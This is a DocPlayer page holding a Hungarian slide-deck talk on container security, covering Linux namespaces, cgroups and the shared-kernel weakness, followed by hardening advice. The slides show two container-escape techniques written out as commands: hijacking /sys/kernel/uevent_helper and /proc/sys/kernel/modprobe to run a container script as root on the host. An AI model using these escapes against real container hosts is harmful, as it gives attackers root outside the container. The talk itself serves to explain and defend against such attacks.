Andrews Kft. Konténerek az IT biztonság szemszögéből. <zambo.marcell@andrews.hu>



Hasonló dokumentumok
Andrews Kft. Konténerek az IT biztonság szemszögéből. 131 /

Virtualizációs Technológiák Operációs rendszer szintű virtualizáció Konténerek Forrás, BME-VIK Virtualizációs technológiák

AppArmor. Névalapú kötelező hozzáférés-vezérlés PPKE-ITK március április

OPERÁCIÓS RENDSZEREK II GYAKORLAT

Az időhöz kötődő parancsok

Virtualizációs technológiák Linux alatt (teljesítményteszt)






[29 / 1] Linux biztonsági lehetőségeinek áttekintése

Szerverterem egy számítógépben avagy hogyan élnek a barack lakói. Mátó Péter <mato.peter@fsf.hu>

LOK Virtualizáció. szabad szofverekkel. Mátó Péter

Virtualizáció szabad szoftverekkel. Mátó Péter

Gyakorla( útmutató és demonstrációk a SZTAKI Felhő használatához

Fájlrendszer-címkézés a SELinuxban

Adatbázis és alkalmazás konszolidáció Oracle SPARC T4/5 alapon

Mikroprocesszorok (Microprocessors, CPU-s)

TI TMDSEVM6472 rövid bemutatása

Programozás alapjai óra. Morvai Flórián, 2010 Dr. Dévényi Károly előadásvázlata alapján

2015/10/08 16:00 1/12 ArchLinux

2. lépés: openssh szerver telepítés sudo apt-get install openssh-server

Virtualizáció. egy hardveren több virtuális rendszer működik egyszerre, virtuális gépekben futó önálló vendég (guest) operációs rendszerek formájában

Felhő alapú hálózatok Konténer alapú virtualizáció Dr. Simon Csaba

Operációs Rendszerek II. labor alkalom

Léteznek nagyon jó integrált szoftver termékek a feladatra. Ezek többnyire drágák, és az üzemeltetésük sem túl egyszerű.

Szalai Ferenc

2016/06/09 13:15 1/108 Linux parancssor

Példa: Aktuális könyvtár tartalmának fájlba mentése, melynek neve az aktuális dátum és idő: ls l > `date+%f_%h-%m`.txt

UNIX / Linux rendszeradminisztráció

OPERÁCIÓS RENDSZEREK 1. ÁTIRÁNYÍTÁSOK, SZŰRŐK

Építsünk IP telefont!

SUSE Container as a Service Platform Nagyvállalati Kubernetes. Papp Zsolt Konzultáns

Az Intel gyorsindító készlete a Linux*-hoz v1.2 Gyorstájékoztató. Megrendelési szám: C

Felhő alapú hálózatok (VITMMA02) OpenStack Neutron Networking

VirtualBox, Debian telepítés

Operációs rendszerek 2 3. alkalom - Reguláris kifejezések, grep, sed. Windisch Gergely windisch.gergely@nik.uni-obuda.hu

Naplózó UFS használata asztali számítógépeken

Néhány kihagyhatatlan Linux tipp és trükk. Ezeket a tippeket olvasóink osztották meg velünk

Számítógépterem hatékony üzemeltetése. Keszthelyi András Budapesti Műszaki Főiskola, Keleti Károly Gazdasági Kar, Szervezési és Vezetési Intézet

Témák. Betörés megelőző rendszerek. Mire használhatjuk az IDS-t? Mi az IDS? (Intruding Detection System)





1. Soroljon fel 3 jellemző tulajdonságát a beszédkódolóknak! Egyet fejtsen ki bővebben!

Utolsó módosítás:

Utolsó módosítás:

Operációs rendszerek előadás Multiprogramozott operációs rendszerek


Youtube videó letöltés és konvertálás Linuxon

A netfilter csomagszűrő tűzfal

Operációs rendszerek. Folyamatok kezelése a UNIX-ban

Könyvtári szervervirtualizáció Oracle Virtual Machine platformon

Operációs rendszerek Memóriakezelés 1.1

OPERÁCIÓS RENDSZEREK I. BEVEZETÉS Koczka Ferenc -

Hiperkonvergens infrastruktúra. Brenner Zoltán rendszermérnök

Processzusok (Processes), Szálak (Threads), Kommunikáció (IPC, Inter-Process Communication)

Alternatív processz állapot és statisztika lekérdezési módszer a Linux kernelben

Sintony SAK 41. Kezelési utasíitás 8AA D0-20/10/99 - UK -

Operációs rendszerek. 4. gyakorlat. BASH bevezetés, script írása, futtatása UNIVERSITAS SCIENTIARUM SZEGEDIENSIS UNIVERSITY OF SZEGED

A Docker alapjai. Takács Ákos PTE Egyetemi Könyvtár és Tudásközpont TAKÁCS ÁKOS - IPSZILON SZEMINÁRIUM - A DOCKER ALAPJAI 1

Felhasználói segédlet a webkonferencia szolgáltatás használatához

Virtualizációs Technológiák Bevezetés Kovács Ákos Forrás, BME-VIK Virtualizációs technológiák

Hálózati operációs rendszerek II. Novell Netware 5.1 Szerver

Felhő alapú hálózatok (VITMMA02) Virtualizáció

Linux fotósoknak. Grafika, multimédia, szórakozás

Operációs rendszerek 2 1. óra: Linux alapok Ismétlés. Windisch Gergely félév

UNIX fájlrendszerek alapismeretei

Szkriptnyelvek. 1. UNIX shell

Utolsó módosítás:

Tűzfal építés az alapoktól. Kadlecsik József KFKI RMKI

Processzusok (Processes), Szálak (Threads), Kommunikáció (IPC, Inter-Process Communication)

Felhő alapú hálózatok (VITMMA02) Virtualizáció

Mérő- és vezérlőberendezés megvalósítása ARM alapú mikrovezérlővel és Linux-szal

Operációs rendszerek. 3. előadás Ütemezés

Budapesti Műszaki és Gazdaságtudományi Egyetem Villamosmérnöki és Informatikai Kar. Virtualizációs technológiák és alkalmazásaik BMEVIMIAV89

Felhő alapú hálózatok (VITMMA02) Hálózat virtualizálás: Overlay hálózatok OpenStack Neutron Networking

2016/06/13 20:37 1/16 Apró linuxos tippek

SAP vállalatirányítási rendszer alapjai

A Unix operációs rendszer és testvérei

Planet Me blog aggregátor létrehozása

Processzus. Operációs rendszerek MINB240. Memória gazdálkodás. Operációs rendszer néhány célja előadás Memóriakezelés

Virtualizációs technológiák és alkalmazások. Házi feladat. A Virtualbox. készítette: Andrus Tamás

UNIX: fájlrendszerek

User-mode Linux Kernel

Bluetooth mérési útmutató 1. mérés

Hálózati réteg, Internet

Multiboot UEFI vel, Windows 10 zel és további disztrókkal Írta: Frank Denissen

IPv6 alapú otthoni LAN hálózat kialakítása

Linux bevezető (jegyzet)

Biztonságos desktop megoldás: Qubes OS

A Sangoma Technologies Intelligens


Cloud computing. Cloud computing. Dr. Bakonyi Péter.

6.2. TMS320C64x és TMS320C67xx DSP használata

Bevezetés a Symbian operációs rendszerbe

Cloud computing Dr. Bakonyi Péter.


Átírás:

Andrews Kft. Konténerek az IT biztonság szemszögéből <zambo.marcell@andrews.hu>

Röviden a virtualizációról Az alap: egy vason, több rendszer. Virtualizáció előnyei: Jobb erőforrás kihasználhatóság. Rendkívüli rugalmasság új létrehozása, meglevő módosítása, másolása (clone), törlése, stb... Virtualizáció fajtái: Hypervisor alapú Operációs rendszer alapú igen, ők a konténerek Alkalmazás alapú

Hypervisor vs Containers Teljes hardver környezetet emulál: hardver támogatás szükséges használatához a host szempontjából a guest csak 1 processz host-tól független kernelt, OS-t is képes futtatni költségesebb a futtatása felépítéséből eredően biztonságosabb A szükséges alrendszereket példányosítja csak: amin az alap OS elfut azon ez is a host szempontjából minden futtatott alkalmazás processz egyedi processz felépítéséből eredően kicsi az overhead az összes guest alatt ugyanaz a kernel fut

Egy kis konténer történelem...

Egy kis konténer történelem...

Linux-os konténerek felépítése Két fő részből tevődnek össze Namespace-ekből, feladatuk a példányosítás megvalósítása, fajtái: MOUNT_NS Fájlrendszer (VFS) csatolásokra vonatkozó ns, régi de kevésbé használt... UTS_NS A hostnév névtérét fele. (a konténerünknek eltérhet a neve a hosttól) IPC_NS SHM, semaphores, message queues szerparációját valósítja meg USER_NS UID/GID-ek virtuális megfeleletetésér felel, a konténeren belül lehetnek saját uid-ek és gid-ek ( - ebben volt egy nagyon csúnya bug,!0 0) PID_NS a konténeren belül saját PID névtér van, hiheti magáról bármely processz hogy ő az 1-es PID (init), külső névtér nem címezhető pid alapján PID_NS!= /proc ns (ilyen nincs is...) NET_NS Teljes hálózati stack... Cgroups-okból erőforrások korlátozása Egyéb: cpuset, cpu, cpuacct, freezer, memory, blkio és devices erőforrás csoportok Capabilitik

Hiányosságok, gyengeségek... A leggyengébb láncszem a közös kernel (nem Linux spec.) A virtualizált processzek közvetlenül a host kernellel állnak kapcsolatban Egy kernel bugra épülő exploit visz mindent Hypervisor alapú sebezhetőségénél, ez többnyire csak az adott guest-et viszi /proc mínusz PID_NS, /sys Pl: /proc/sys/vm/drop_cache, /proc/sysrq-trigger és társai echo 0 tee /sys/devices/system/cpu/cpu*/online ue memory-val [409388.207773] kvm: disabling virtualization on CPU1 [409388.207790] smpboot: CPU 1 is now offline

kitörés a sysfs-en keresztül Ha root vagy a konténerben root leszel kint is... root@lxc# cat /tmp/evil_helper #!/bin/bash set >> /tmp/alma1 date >> /tmp/alma1 root@lxc# echo /var/lib/lxc/lxc/rootfs/tmp/evil_helper > /sys/kernel/uevent_helper root@lxc# cat /sys/kernel/uevent_helper /var/lib/lxc/lxc/rootfs/tmp/evil_helper root@lxc# echo change > /sys/class/mem/null/uevent hatására lefut a /var/lib/lxc/lxc/rootfs/tmp/evil_helper

kitörés a procfs-en keresztül root@lxc# cat /tmp/x #!/bin/bash mkdir /tmp/12345alma root@lxc# cat /proc/sys/kernel/modprobe /sbin/modprobe root@lxc# echo /var/lib/lxc/lxc/rootfs/tmp/x > /proc/sys/kernel/modprobe root@telekom-vpn:/proc# iptables -t raw -nl iptables v1.4.21: can't initialize iptables table `raw': Table does not exist (do you need to insmod?) root@host:ls -dl /tmp/12345alma/ drw-rw---- 2 root root 40 máj 19 09:41 /tmp/12345alma/

Védelmi lehetőségek, teendők 1. Az alaprendszer megerősítése Pax/Grsec, Apparmor, SELinux Szedjük szét több gépre a konténereinket, biztonsági besorolásuk szerint (akár a valódi hostok hálózati szeparációja esetében) Konténerek megerősítése Unpriveledged Containers Capabilitik megfelelő használata lxc.cgroup.devices lxc.cgroup.devices.deny = a # mindent tilos, lxc.cgroup.devices.allow = # kivéve amit szabad elv alkalmazása Minimalizálni kell a konténerben rootként futó alkalmazások számát és ha lehet jogait.

Védelmi lehetőségek, teendők 2. Seccomp alkalmazása A /proc és /sys mountolásának felülvizsgálata (részleges mount, RO mount) Auditd hangolása a konténerek felügyeletére Securebits (SECURE_NOROOT, SET_DUMPABLE) és társainak használata, man prctl :) Cgroups-ok mellett érdemes figyelni az rlimit-ek értékeire

Hasznos biztonsági kütyük mbox http://pdos.csail.mit.edu/mbox/ firejail https://l3net.wordpress.com/projects/firejail/ minijail https://chromium.googlesource.com/chromiumos/platform/minijail/ Olvasnivalók https://www.kernel.org/doc/documentation/namespaces/compatibility-list.txt https://www.kernel.org/doc/documentation/namespaces/resource-control.txt

Ezt itt töltheted le: http://andrews.hu/wp-content/uploads/2015/05/ankert.pdf

2025 © DocPlayer.hu Adatvédelmi irányelvek | Szolgáltatási feltételek | Visszajelzés